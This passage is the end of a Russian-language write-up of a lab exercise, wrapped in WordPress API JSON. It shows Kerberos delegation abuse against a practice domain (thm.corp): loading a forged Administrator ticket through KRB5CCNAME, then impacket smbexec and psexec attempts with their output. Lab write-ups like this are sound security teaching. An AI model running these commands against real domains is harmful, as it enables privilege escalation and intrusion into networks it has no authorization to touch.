\u0438 \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u0442\u044c \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 spn. \u041e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043d\u0430 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443 https:\/\/blog.deephacking.tech\/en\/posts\/constrained-delegation-y-resource-based-constrained-delegation\/\u0415\u0441\u043b\u0438 \u0443\u043a\u0430\u0437\u0430\u0442\u044c spn \u0431\u0435\u0437 \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438, \u0442\u043e \u0431\u0438\u043b\u0435\u0442 \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0432\u044b\u043f\u0438\u0448\u0435\u0442\u0441\u044f, \u043e\u0434\u043d\u0430\u043a\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u0441\u044f \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u0432\u044b\u0448\u043b\u043e.\u0414\u0430\u043b\u0435\u0435 \u0438\u043c\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u0432 \u0441\u0435\u0441\u0441\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e KRB5CCNAME.export KRB5CCNAME=\/tmp\/Administrator@cifs_HAYSTACK@THM.CORP.ccache\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433\u0438\u041e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u044c\u0441\u044f.impacket-smbexec -k -no-pass -dc-ip &#8216;thm.corp&#8217; &#8216;THM.CORP\/Administrator@haystack.thm.corp&#8217;Impacket v0.14.0.dev0 &#8212; Copyright Fortra, LLC and its affiliated companies [-] SMB SessionError: code: 0xc0000034 &#8212; STATUS_OBJECT_NAME_NOT_FOUND &#8212; The object name is not found.\u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0447\u0435\u0440\u0435\u0437 psexec\u2026impacket-psexec -k -no-pass -dc-ip &#8216;thm.corp&#8217; &#8216;THM.CORP\/Administrator@haystack.thm.corp&#8217; Impacket v0.14.0.dev0 &#8212; Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on haystack.thm.corp&#8230;..[*] Found writable share ADMIN$[*] Uploading file rUxIcyGE.exe[*] Opening SVCManager on haystack.thm.corp&#8230;..[*] Creating service JSZX on haystack.thm.corp&#8230;..[*] Starting service JSZX&#8230;..[*] Opening SVCManager on haystack.thm.corp&#8230;..[-] Error performing the uninstallation, cleaning up\u0422\u043e\u0436\u0435 \u0431\u043e\u0440\u043e\u0434\u0430.\u041f\u043e\u0447\u0435\u043c\u0443 wmiexec \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u0430\u043c, \u0433\u0434\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u0442\u0435\u0440\u043f\u044f\u0442 \u043d\u0435\u0443\u0434\u0430\u0447\u0443: smbexec \u0438 psexec \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0443\u0436\u0431 Windows \u0447\u0435\u0440\u0435\u0437 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u0441\u043b\u0443\u0436\u0431, \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0434\u0438\u0441\u043a \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0436\u0438\u0437\u043d\u0435\u043d\u043d\u044b\u043c \u0446\u0438\u043a\u043b\u043e\u043c &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-481722","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/481722","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=481722"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/481722\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=481722"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=481722"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=481722"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}